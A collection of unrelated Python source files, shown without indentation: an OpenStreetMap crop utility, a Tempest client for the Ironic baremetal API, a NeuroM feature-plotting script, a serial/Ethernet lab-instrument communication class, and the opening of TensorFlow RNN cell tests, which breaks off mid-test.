def ChangeEnd(self, changeType):
#print "end", changeType
self.dec.funcStoreNode = None
self.dec.funcStoreWay = None
self.dec.funcStoreRelation = None
def LoadFromOscXml(self, fi):
self.dec = osmxml.OsmXmlDecode(fi)
self.dec.funcChangeStart = self.ChangeStart
self.dec.funcChangeEnd = self.ChangeEnd
eof = False
while not eof:
eof = self.dec.DecodeNext()
self.dec = None
#Utilitiy functions
def Crop(osmData, bbox):
#Get nodes in bbox
nodesInBbox = set()
nodeDict = {}
for node in osmData.nodes:
objId, metaData, tags, [lat, lon] = node
nodeDict[objId] = (objId, metaData, tags, [lat, lon])
if lon < bbox[0] or lon > bbox[2] or lat < bbox[1] or lat > bbox[3]:
continue
nodesInBbox.add(objId)
#Get ways in bbox
waysInQuery = set()
wayDict = {}
nodesInQuery = nodesInBbox.copy()
for way in osmData.ways:
objId, metaData, tags, members = way
wayDict[objId] = way
membersSet = set(members)
nodesInMembers = len(membersSet.intersection(nodesInBbox))
if nodesInMembers == 0:
continue
nodesInQuery.update(members)
waysInQuery.add(objId)
#Get relations in bbox
relationsInQuery = set()
relationDict = {}
for relation in osmData.relations:
hit = False
objId, metaData, tags, members = relation
relationDict[objId] = relation
for memTy, memId, memRole in members:
hit = (memTy == "node" and memId in nodesInQuery)
if hit: break
hit = (memTy == "way" and memId in waysInQuery)
if hit: break
if not hit:
continue
relationsInQuery.add(objId)
#Get parent relations
relationsAndParents = relationsInQuery.copy()
uncheckedRelations = relationsInQuery.copy()
for i in range(10):
if len(uncheckedRelations) == 0:
break
foundRelations = set()
for objId, metaData, tags, members in osmData.relations:
hit = False
for memTy, memId, memRole in members:
hit = (memTy == "relation" and memId in uncheckedRelations)
if hit: break
if not hit:
continue
if objId not in relationsAndParents:
foundRelations.add(objId)
relationsAndParents.update(foundRelations)
uncheckedRelations = foundRelations
#Copy results to object
outOsmData = OsmData()
for objId in nodesInQuery:
outOsmData.nodes.append(nodeDict[objId])
for objId in waysInQuery:
outOsmData.ways.append(wayDict[objId])
for objId in relationsAndParents:
outOsmData.relations.append(relationDict[objId])
outOsmData.bounds = [bbox]
return outOsmData
def IndexObjectsById(osmData):
out = {'nodes': {}, 'ways': {}, 'relations': {}}
for objId, metaData, tags, pos in osmData.nodes:
out['nodes'][objId] = metaData, tags, pos
for objId, metaData, tags, members in osmData.ways:
out['ways'][objId] = metaData, tags, members
for objId, metaData, tags, members in osmData.ways:
out['relations'][objId] = metaData, tags, members
return out
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.services.baremetal import base
class BaremetalClient(base.BaremetalClient):
"""Base Tempest REST client for Ironic API v1."""
version = '1'
uri_prefix = 'v1'
@base.handle_errors
def list_nodes(self, **kwargs):
"""List all existing nodes."""
return self._list_request('nodes', **kwargs)
@base.handle_errors
def list_chassis(self):
"""List all existing chassis."""
return self._list_request('chassis')
@base.handle_errors
def list_chassis_nodes(self, chassis_uuid):
"""List all nodes associated with a chassis."""
return self._list_request('/chassis/%s/nodes' % chassis_uuid)
@base.handle_errors
def list_ports(self, **kwargs):
"""List all existing ports."""
return self._list_request('ports', **kwargs)
@base.handle_errors
def list_node_ports(self, uuid):
"""List all ports associated with the node."""
return self._list_request('/nodes/%s/ports' % uuid)
@base.handle_errors
def list_nodestates(self, uuid):
"""List all existing states."""
return self._list_request('/nodes/%s/states' % uuid)
@base.handle_errors
def list_ports_detail(self, **kwargs):
"""Details list all existing ports."""
return self._list_request('/ports/detail', **kwargs)
@base.handle_errors
def list_drivers(self):
"""List all existing drivers."""
return self._list_request('drivers')
@base.handle_errors
def show_node(self, uuid):
"""Gets a specific node.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
return self._show_request('nodes', uuid)
@base.handle_errors
def show_node_by_instance_uuid(self, instance_uuid):
"""Gets a node associated with given instance uuid.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
uri = '/nodes/detail?instance_uuid=%s' % instance_uuid
return self._show_request('nodes',
uuid=None,
uri=uri)
@base.handle_errors
def show_chassis(self, uuid):
"""Gets a specific chassis.
:param uuid: Unique identifier of the chassis in UUID format.
:return: Serialized chassis as a dictionary.
"""
return self._show_request('chassis', uuid)
@base.handle_errors
def show_port(self, uuid):
"""Gets a specific port.
:param uuid: Unique identifier of the port in UUID format.
:return: Serialized port as a dictionary.
"""
return self._show_request('ports', uuid)
@base.handle_errors
def show_port_by_address(self, address):
"""Gets a specific port by address.
:param address: MAC address of the port.
:return: Serialized port as a dictionary.
"""
uri = '/ports/detail?address=%s' % address
return self._show_request('ports', uuid=None, uri=uri)
def show_driver(self, driver_name):
"""Gets a specific driver.
:param driver_name: Name of driver.
:return: Serialized driver as a dictionary.
"""
return self._show_request('drivers', driver_name)
@base.handle_errors
def create_node(self, chassis_id=None, **kwargs):
"""Create a baremetal node with the specified parameters.
:param cpu_arch: CPU architecture of the node. Default: x86_64.
:param cpus: Number of CPUs. Default: 8.
:param local_gb: Disk size. Default: 1024.
:param memory_mb: Available RAM. Default: 4096.
:param driver: Driver name. Default: "fake"
:return: A tuple with the server response and the created node.
"""
node = {'chassis_uuid': chassis_id,
'properties': {'cpu_arch': kwargs.get('cpu_arch', 'x86_64'),
'cpus': kwargs.get('cpus', 8),
'local_gb': kwargs.get('local_gb', 1024),
'memory_mb': kwargs.get('memory_mb', 4096)},
'driver': kwargs.get('driver', 'fake')}
return self._create_request('nodes', node)
@base.handle_errors
def create_chassis(self, **kwargs):
"""Create a chassis with the specified parameters.
:param description: The description of the chassis.
Default: test-chassis
:return: A tuple with the server response and the created chassis.
"""
chassis = {'description': kwargs.get('description', 'test-chassis')}
return self._create_request('chassis', chassis)
@base.handle_errors
def create_port(self, node_id, **kwargs):
"""Create a port with the specified parameters.
:param node_id: The ID of the node which owns the port.
:param address: MAC address of the port.
:param extra: Meta data of the port. Default: {'foo': 'bar'}.
:param uuid: UUID of the port.
:return: A tuple with the server response and the created port.
"""
port = {'extra': kwargs.get('extra', {'foo': 'bar'}),
'uuid': kwargs['uuid']}
if node_id is not None:
port['node_uuid'] = node_id
if kwargs['address'] is not None:
port['address'] = kwargs['address']
return self._create_request('ports', port)
@base.handle_errors
def delete_node(self, uuid):
"""Deletes a node having the specified UUID.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('nodes', uuid)
@base.handle_errors
def delete_chassis(self, uuid):
"""Deletes a chassis having the specified UUID.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('chassis', uuid)
@base.handle_errors
def delete_port(self, uuid):
"""Deletes a port having the specified UUID.
:param uuid: The unique identifier of the port.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('ports', uuid)
@base.handle_errors
def update_node(self, uuid, **kwargs):
"""Update the specified node.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the updated node.
"""
node_attributes = ('properties/cpu_arch',
'properties/cpus',
'properties/local_gb',
'properties/memory_mb',
'driver',
'instance_uuid')
patch = self._make_patch(node_attributes, **kwargs)
return self._patch_request('nodes', uuid, patch)
@base.handle_errors
def update_chassis(self, uuid, **kwargs):
"""Update the specified chassis.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the updated chassis.
"""
chassis_attributes = ('description',)
patch = self._make_patch(chassis_attributes, **kwargs)
return self._patch_request('chassis', uuid, patch)
@base.handle_errors
def update_port(self, uuid, patch):
"""Update the specified port.
:param uuid: The unique identifier of the port.
:param patch: List of dicts representing json patches.
:return: A tuple with the server response and the updated port.
"""
return self._patch_request('ports', uuid, patch)
@base.handle_errors
def set_node_power_state(self, node_uuid, state):
"""Set power state of the specified node.
:param node_uuid: The unique identifier of the node.
:state: desired state to set (on/off/reboot).
"""
target = {'target': state}
return self._put_request('nodes/%s/states/power' % node_uuid,
target)
@base.handle_errors
def validate_driver_interface(self, node_uuid):
"""Get all driver interfaces of a specific node.
:param uuid: Unique identifier of the node in UUID format.
"""
uri = '{pref}/{res}/{uuid}/{postf}'.format(pref=self.uri_prefix,
res='nodes',
uuid=node_uuid,
postf='validate')
return self._show_request('nodes', node_uuid, uri=uri)
@base.handle_errors
def set_node_boot_device(self, node_uuid, boot_device, persistent=False):
"""Set the boot device of the specified node.
:param node_uuid: The unique identifier of the node.
:param boot_device: The boot device name.
:param persistent: Boolean value. True if the boot device will
persist to all future boots, False if not.
Default: False.
"""
request = {'boot_device': boot_device, 'persistent': persistent}
resp, body = self._put_request('nodes/%s/management/boot_device' %
node_uuid, request)
self.expected_success(204, resp.status)
return body
@base.handle_errors
def get_node_boot_device(self, node_uuid):
"""Get the current boot device of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_node_supported_boot_devices(self, node_uuid):
"""Get the supported boot devices of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device/supported' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_console(self, node_uuid):
"""Get connection information about the console.
:param node_uuid: Unique identifier of the node in UUID format.
"""
resp, body = self._show_request('nodes/states/console', node_uuid)
self.expected_success(200, resp.status)
return resp, body
@base.handle_errors
def set_console_mode(self, node_uuid, enabled):
"""Start and stop the node console.
:param node_uuid: Unique identifier of the node in UUID format.
:param enabled: Boolean value; whether to enable or disable the
console.
"""
enabled = {'enabled': enabled}
resp, body = self._put_request('nodes/%s/states/console' % node_uuid,
enabled)
self.expected_success(202, resp.status)
return resp, body
|
|
#!/usr/bin/env python
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Plot a selection of features from a morphology population."""
from collections import defaultdict
from collections import namedtuple
import sys
import json
import argparse
import numpy as np
import neurom as nm
from neurom.view import matplotlib_utils
import scipy.stats as _st
from matplotlib.backends.backend_pdf import PdfPages
DISTS = {
'normal': lambda p, bins: _st.norm.pdf(bins, p['mu'], p['sigma']),
'uniform': lambda p, bins: _st.uniform.pdf(bins, p['min'], p['max'] - p['min']),
'constant': lambda p, bins: None
}
def bin_centers(bin_edges):
"""Return array of bin centers given an array of bin edges"""
return (bin_edges[1:] + bin_edges[:-1]) / 2.0
def bin_widths(bin_edges):
"""Return array of bin widths given an array of bin edges"""
return bin_edges[1:] - bin_edges[:-1]
def histo_entries(histo):
"""Calculate the number of entries in a histogram
This is the sum of bin height * bin width
"""
bw = bin_widths(histo[1])
return np.sum(histo[0] * bw)
def dist_points(bin_edges, d):
"""Return an array of values according to a distribution
Points are calculated at the center of each bin
"""
bc = bin_centers(bin_edges)
if d is not None:
d = DISTS[d['type']](d, bc)
return d, bc
def calc_limits(data, dist=None, padding=0.25):
"""Calculate a suitable range for a histogram
Returns:
tuple of (min, max)
"""
dmin = sys.float_info.max if dist is None else dist.get('min',
sys.float_info.max)
dmax = sys.float_info.min if dist is None else dist.get('max',
sys.float_info.min)
_min = min(min(data), dmin)
_max = max(max(data), dmax)
padding = padding * (_max - _min)
return _min - padding, _max + padding
# Neurite types of interest
NEURITES_ = (nm.NeuriteType.axon,
nm.NeuriteType.apical_dendrite,
nm.NeuriteType.basal_dendrite,)
# Features of interest
FEATURES = ('segment_lengths',
'section_lengths',
'section_path_distances',
'section_radial_distances',
'trunk_origin_radii')
def load_neurite_features(filepath):
"""Unpack relevant data into megadict."""
stuff = defaultdict(lambda: defaultdict(list))
morphs = nm.load_morphologies(filepath)
# unpack data into arrays
for m in morphs:
for t in NEURITES_:
for feat in FEATURES:
stuff[feat][str(t).split('.')[1]].extend(
nm.get(feat, m, neurite_type=t)
)
return stuff
Plot = namedtuple('Plot', 'fig, ax')
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
description='Morphology feature plotter',
epilog='Note: Makes plots of various features and superimposes\
input distributions. Plots are saved to PDF file.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('datapath',
help='Morphology data directory path')
parser.add_argument('--mtypeconfig',
required=True,
help='Get mtype JSON configuration file')
parser.add_argument('--output',
default='plots.pdf',
help='Output PDF file name')
return parser.parse_args()
def main(data_dir, mtype_file): # pylint: disable=too-many-locals
"""Run the stuff."""
# data structure to store results
stuff = load_neurite_features(data_dir)
sim_params = json.load(open(mtype_file))
# load histograms, distribution parameter sets and figures into arrays.
# To plot figures, do
# plots[i].fig.show()
# To modify an axis, do
# plots[i].ax.something()
_plots = []
for feat, d in stuff.items():
for typ, data in d.items():
dist = sim_params['components'][typ].get(feat, None)
print('Type = %s, Feature = %s, Distribution = %s' % (typ, feat, dist))
# if no data available, skip this feature
if not data:
print("No data found for feature %s (%s)" % (feat, typ))
continue
# print 'DATA', data
num_bins = 100
limits = calc_limits(data, dist)
bin_edges = np.linspace(limits[0], limits[1], num_bins + 1)
histo = np.histogram(data, bin_edges, normed=True)
print('PLOT LIMITS:', limits)
# print 'DATA:', data
# print 'BIN HEIGHT', histo[0]
plot = Plot(*matplotlib_utils.get_figure(new_fig=True, subplot=111))
plot.ax.set_xlim(*limits)
plot.ax.bar(histo[1][:-1], histo[0], width=bin_widths(histo[1]))
dp, bc = dist_points(histo[1], dist)
# print 'BIN CENTERS:', bc, len(bc)
if dp is not None:
# print 'DIST POINTS:', dp, len(dp)
plot.ax.plot(bc, dp, 'r*')
plot.ax.set_title('%s (%s)' % (feat, typ))
_plots.append(plot)
return _plots
if __name__ == '__main__':
args = parse_args()
print('MTYPE FILE:', args.mtypeconfig)
plots = main(args.datapath, args.mtypeconfig)
pp = PdfPages(args.output)
for p in plots:
pp.savefig(p.fig)
pp.close()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
from __future__ import division
import sys
import os
import time
import glob
import serial
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import struct
import re
import urllib2
import urlparse
import pprint
from smartFormat import smartFormat, simpleFormat
if os.name is 'nt':
import scanwin32
if os.name is 'posix':
pass
def wstdout(s):
sys.stdout.write(s)
sys.stdout.flush()
def wstderr(s):
sys.stderr.write(s)
sys.stderr.flush()
PPstderr = pprint.PrettyPrinter(indent=2, width=80, depth=None, stream=sys.stderr)
PPstdout = pprint.PrettyPrinter(indent=2, width=80, depth=None, stream=sys.stderr)
#===============================================================================
# Module exception definitions
#===============================================================================
class CommProtocolError(Exception):
pass
class MethodCallError(CommProtocolError):
pass
class InvalidArgumentError(CommProtocolError):
pass
class ArgumentConversionError(InvalidArgumentError):
pass
class ArgumentLengthError(InvalidArgumentError):
pass
class UnexptectedArgumentError(InvalidArgumentError):
pass
class InvalidResponseError(CommProtocolError):
pass
class ResponseConversionError(InvalidResponseError):
pass
class ResponseLengthError(InvalidResponseError):
pass
class UnexptectedResponseError(InvalidResponseError):
pass
class UnsupportedOSError(CommProtocolError):
pass
class InvalidCommandError(CommProtocolError):
pass
class ChecksumMismatchError(CommProtocolError):
pass
class SerialPortError(CommProtocolError):
pass
class InstrumentComms(object):
def __init__(self, useSerial=True, useEthernet=False,
ipAddress=None, ethPort=80,
serialPortName=None,
baud=19200, bytesize=8, parity='N', stopbits=1,
timeout=2, xonxoff=False, rtscts=False, dsrdtr=False,
serCmdPrefix="", serCmdTerm='\r', serIdnCmd='*IDN?',
ethCmdPrefix='COMMAND=', ethCmdTerm='\r\ngpibsend=Send\r\n',
ethDataRE=re.compile('.*<TEXTAREA.*>(.*)</TEXTAREA>'),
ethIdnCmd='*IDN?',
argSep=""):
self.config = {}
self.data = {}
self.lowerRegex = re.compile("[a-z]")
self.useSerial = useSerial
self.useEthernet = useEthernet
if self.useEthernet == True and ipAddress == None:
raise CommProtocolError("IP address must be supplied")
else:
self.ipAddress = ipAddress
if self.useEthernet == True and ethPort == None:
raise CommProtocolError("Ethernet port must be supplied")
else:
self.ethPort = ethPort
self.controllerSPName = serialPortName
if self.useSerial:
self.serialPort = serial.Serial()
else:
self.serialPort = None
# Common baud rates: 115200, 38400, 19200, 9600, 4800, 2400, 1200
self.BAUDRATE = baud
self.BYTESIZE = bytesize
self.PARITY = parity
self.STOPBITS = stopbits
self.SERIALTIMEOUT = timeout
self.XONXOFF = xonxoff
self.RTSCTS = rtscts
self.DSRDTR = dsrdtr
self.SERCMD_TERM = serCmdTerm
self.SERCMD_TERM_LEN = len(self.SERCMD_TERM)
self.SERCMD_PREFIX = serCmdPrefix
self.ETHCMD_PREFIX = ethCmdPrefix
self.ETHCMD_TERM = ethCmdTerm
self.ETHDATA_RE = ethDataRE
self.CMD_ARG_SEP = argSep
def scanSerialPorts(self, debug=False):
if not self.useSerial:
raise Exception("Serial port operations not allowed")
if self.serialPort.isOpen():
self.serialPort.flushInput()
self.serialPort.flushOutput()
self.serialPort.close()
if os.name is 'nt':
possibleSerPorts = [cp[1] for cp in sorted(scanwin32.comports())]
elif os.name is 'posix':
possibleSerPorts = glob.glob('/dev/ttyS*') + \
glob.glob('/dev/ttyUSB*') + glob.glob('/dev/ttyACM*')
else:
raise UnsupportedOSError("Operating system " + os.name +
" unsupported.")
serPorts = []
for psp in possibleSerPorts:
try:
#-- Open port with the settings we will use, to make sure these
# work on the given port
self.openPort(psp)
sp = self.serialPort
spDict = {}
spDict['name'] = sp.portstr
spDict['supportedBaudrates'] = sp.getSupportedBaudrates()
spDict['supportedByteSizes'] = sp.getSupportedByteSizes()
spDict['supportedParities'] = sp.getSupportedParities()
spDict['supportedStopbits'] = sp.getSupportedStopbits()
self.__closeSerialPort()
serPorts.append(spDict)
except: # serial.Serial.SerialException, err:
#wstderr('ERROR: %s\n' % str(err))
pass
self.serPorts = serPorts
if debug:
wstderr("\nD0 --> serPorts:\n"+PPstderr.pformat(serPorts)+"\n\n")
return self.serPorts
def simpleSerial(self, debug=False):
allSP = self.scanSerialPorts(debug)
self.controllerSPName = allSP[0]['name']
self.openPort()
def findInstrument(self, mfr=None, model=None, idnStr=None,
ethMAC=None, ethHostname=None,
searchSerial=True, searchEthernet=True,
searchGPIB=False, idnQueryStr="*IDN?",
debug=False):
instrumentMatches = {'serial':[], 'ethernet':[], 'GPIB':[]}
if searchSerial:
#-- Search serial ports for the instrument
allSP = self.scanSerialPorts(debug)
for spNum in range(len(allSP)):
isMatch = True
self.openPort(allSP[spNum]['name'])
if mfr or model or idnStr:
try:
idn = self.query(idnQueryStr)
except:
isMatch = False
continue
if mfr and not np.any([mfr.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if model and not np.any([model.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if idnStr and not np.any([idnStr.upper() in s.upper()
for s in idn.split(",")]):
isMatch = False
if ethMAC:
try:
MACAddy = self.query("ETHERnet:ENETADDress?")
except:
isMatch = False
continue
if ethHostname:
try:
hostname = self.query("ETHERnet:NAME?")
except:
continue
if mfr and not np.any([mfr.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if isMatch:
instrumentMatches['serial'].append(self.controllerSPName)
if searchEthernet:
pass
if searchGPIB:
pass
if debug:
wstderr("\nD0 --> instrumentMatches:\n" +
PPstderr.pformat(instrumentMatches) + "\n\n")
return instrumentMatches
def __openSerialPort(self, serPortName=None):
if not self.useSerial:
raise Exception("Serial port operations not allowed")
self.__closeSerialPort()
if serPortName == None:
serPortName = self.controllerSPName
if self.controllerSPName == None:
raise SerialPortError("No valid serial port found")
self.serialPort = serial.Serial(
serPortName, baudrate=self.BAUDRATE, bytesize=self.BYTESIZE,
parity=self.PARITY, stopbits=self.STOPBITS,
timeout=self.SERIALTIMEOUT, xonxoff=self.XONXOFF,
rtscts=self.RTSCTS, writeTimeout=self.SERIALTIMEOUT,
dsrdtr=self.DSRDTR, interCharTimeout=self.SERIALTIMEOUT
)
self.serialPort.flushInput()
self.serialPort.flushOutput()
return self.serialPort
def __closeSerialPort(self):
if self.serialPort.isOpen():
self.serialPort.close()
self.serialPortOpen = False
def __serialSendCommand(self, command, upperCaseOnly=True):
if not self.isPortOpen():
self.openPort()
if upperCaseOnly:
command2 = self.lowerRegex.sub('', command)
else:
command2 = command
#wstderr("\""+ command2 +"\"\n")
fullString = self.SERCMD_PREFIX + command2 + self.SERCMD_TERM
#-- Send command
#print "="*80
#print "Sending..."
#print "command: '" + command + "' translated to '" + command2 + "'"
#print ""
#sys.stdout.flush()
#-- Send first char, wait for 1 second, then send remaining chars
self.serialPort.write(fullString)
self.serialPort.flush()
def __serialReceiveASCIIResponse(self, timeout=0):
t0 = time.time()
if not self.serialPort.isOpen():
self.openPort()
# DEBUG
#print "Receiving..."
#sys.stdout.flush()
try:
response = ''
char = ''
while True:
char = self.serialPort.read(1)
if char == "":
raise Exception("Serial port timeout exceeded")
response += char
# DEBUG
#sys.stdout.write('\n"' + str(response) + '"\n"')
#sys.stdout.flush()
if response[-self.SERCMD_TERM_LEN:] == self.SERCMD_TERM:
response = response[0:-self.SERCMD_TERM_LEN]
# DEBUG
#sys.stdout.write('breaking!')
#sys.stdout.flush()
break
if (timeout > 0) and (time.time()-t0 > timeout):
raise Exception("Response timeout exceeded")
except:
# DEBUG
#print "ERROR getting response"
#sys.stdout.flush()
raise Exception("ERROR getting response")
if len(response) < 1000:
pass
# DEBUG
#print 'response: >>', response
#sys.stdout.flush()
else:
pass
# DEBUG
#print 'response[0:500]', response[0:500]
#sys.stdout.flush()
# DEBUG
#print 'response len >>', len(response)
#sys.stdout.flush()
return response
def __serialReceiveBinaryResponse(self, timeout=0):
t0 = time.time()
if not self.isPortOpen():
self.openPort()
try:
response = ''
char = ''
#-- Try twice to receive initial char: should be '#'
goodToGo = False
for n in range(2):
if self.serialPort.read(1) == '#':
goodToGo = True
break
if not goodToGo:
raise Exception(
"ERROR -- initial char in binary receive not '#'")
#-- Receive char that indicates how many ascii characters to get
# that will tell the length of the binary data to be transferred
dataLengthNumberLength = int(self.serialPort.read(1))
#print dataLengthNumberLength
lengthStr = ''
for n in range(dataLengthNumberLength):
lengthStr += self.serialPort.read(1)
dataLength = int(lengthStr)
#print dataLength
data = ''
bytesToRead = dataLength
n = 0
while True:
data += self.serialPort.read(1)
n += 1
if n == bytesToRead:
break
#-- Read the command termination character or sequence
terminator = ''
for n in range(self.SERCMD_TERM_LEN):
terminator += self.serialPort.read(1)
if (timeout > 0) and (time.time()-t0 > timeout):
raise Exception("Response timeout exceeded")
except:
raise Exception("ERROR getting response")
if len(data) < 500:
pass
else:
pass
return data
def __ethernetQuery(self, command, returnResponse=True, upperCaseOnly=True,
timeout=0):
# TODO: Implement timeout
url = 'http://' + self.ipAddress + '/Comm.html' #+ str(self.ethPort)
if upperCaseOnly:
command2 = self.lowerRegex.sub('', command)
else:
command2 = command
#wstderr("\""+ command2 +"\"\n")
httpPostSendStr = self.ETHCMD_PREFIX + command2 + self.ETHCMD_TERM
fullRequest = urllib2.Request(url, httpPostSendStr)
cnxn = urllib2.urlopen(fullRequest)
httpPostReturnStr = cnxn.read()
#wstdout('-'*80 + '\n' + str(httpPostSendStr) + '\n')
#wstdout(str(httpPostReturnStr) + '\n' )
if returnResponse:
response = self.ETHDATA_RE.findall(httpPostReturnStr)[0]
#wstdout(str(response) + '-'*80 + '\n')
return response
else:#
pass
#wstdout('-'*80 + '\n')
def __ethernetBinaryQuery(self, command, returnResponse=True, timeout=0):
"""??? -- Haven't figured out how to do binary data via HTTP post;
possibly if I used a different command altogether (see web
interface, as they have a data download function there)"""
# TODO: Implement timeout
url = 'http://' + self.ipAddress + '/Comm.html' #+ str(self.ethPort)
s = self.ETHCMD_PREFIX + command + self.ETHCMD_TERM
httpPostSendStr = s
fullRequest = urllib2.Request(url, httpPostSendStr)
cnxn = urllib2.urlopen(fullRequest)
httpPostReturnStr = cnxn.read()
#httpPostReturnStr += cnxn.read()
#httpPostReturnStr += cnxn.read()
#wstdout('-'*80 + '\n' + str(httpPostSendStr) + '\n')
#wstdout(str(httpPostReturnStr) + '\n' )
if returnResponse:
response = self.ETHDATA_RE.findall(httpPostReturnStr)[0]
#wstdout(str(response) + '-'*80 + '\n')
return response
else:
pass
#wstdout('-'*80 + '\n')
def receiveBinaryResponse(self, timeout=0):
if self.useSerial:
return self.__serialReceiveBinaryResponse(timeout=timeout)
else:
return self.__receiveEtherentResponse(timeout=timeout)
def isPortOpen(self):
if self.useEthernet:
return True
else:
return self.serialPort.isOpen()
def openPort(self, spName=None):
if spName != None:
self.controllerSPName = spName
if self.useEthernet:
return
self.__openSerialPort()
def closePort(self):
if self.useEthernet:
return
self.__closeSerialPort()
def tell(self, command):
if self.useSerial:
self.__serialSendCommand(command)
else:
self.__ethernetQuery(command, returnResponse=False)
def query(self, command, timeout=0):
if self.useSerial:
self.__serialSendCommand(command)
return self.__serialReceiveASCIIResponse(timeout=timeout)
else:
return self.__ethernetQuery(command, timeout=timeout)
def listen(self, timeout=0):
if self.useSerial:
return self.__serialReceiveASCIIResponse(timeout=timeout)
else:
raise Exception("Cannot just listen while using Ethernet comms")
def binQuery(self, command, timeout=0):
if self.useSerial:
self.__serialSendCommand(command)
return self.__serialReceiveBinaryResponse(timeout=timeout)
else:
return self.__ethernetQuery(command, timeout=timeout)
def binListen(self, timeout=0):
if self.useSerial:
return self.receiveBinaryResponse(timeout=timeout)
else:
raise Exception("Cannot just listen while using Ethernet comms")
if __name__ == "__main__":
tk = InstrumentComms()
#tk.testPlot(4)
#plt.show()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
import tensorflow as tf
# TODO(ebrevdo): Remove once _linear is fully deprecated.
# pylint: disable=protected-access
from tensorflow.python.ops.rnn_cell import _linear as linear
# pylint: enable=protected-access
class RNNCellTest(tf.test.TestCase):
def testLinear(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(1.0)):
x = tf.zeros([1, 2])
l = linear([x], 2, False)
sess.run([tf.initialize_all_variables()])
res = sess.run([l], {x.name: np.array([[1., 2.]])})
self.assertAllClose(res[0], [[3.0, 3.0]])
# Checks prevent you from accidentally creating a shared function.
with self.assertRaises(ValueError):
l1 = linear([x], 2, False)
# But you can create a new one in a new scope and share the variables.
with tf.variable_scope("l1") as new_scope:
l1 = linear([x], 2, False)
with tf.variable_scope(new_scope, reuse=True):
linear([l1], 2, False)
self.assertEqual(len(tf.trainable_variables()), 2)
def testBasicRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
g, _ = tf.nn.rnn_cell.BasicRNNCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[0].shape, (1, 2))
def testGRUCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
g, _ = tf.nn.rnn_cell.GRUCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
# Smoke test
self.assertAllClose(res[0], [[0.175991, 0.175991]])
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3]) # Test GRUCell with input_size != num_units.
m = tf.zeros([1, 2])
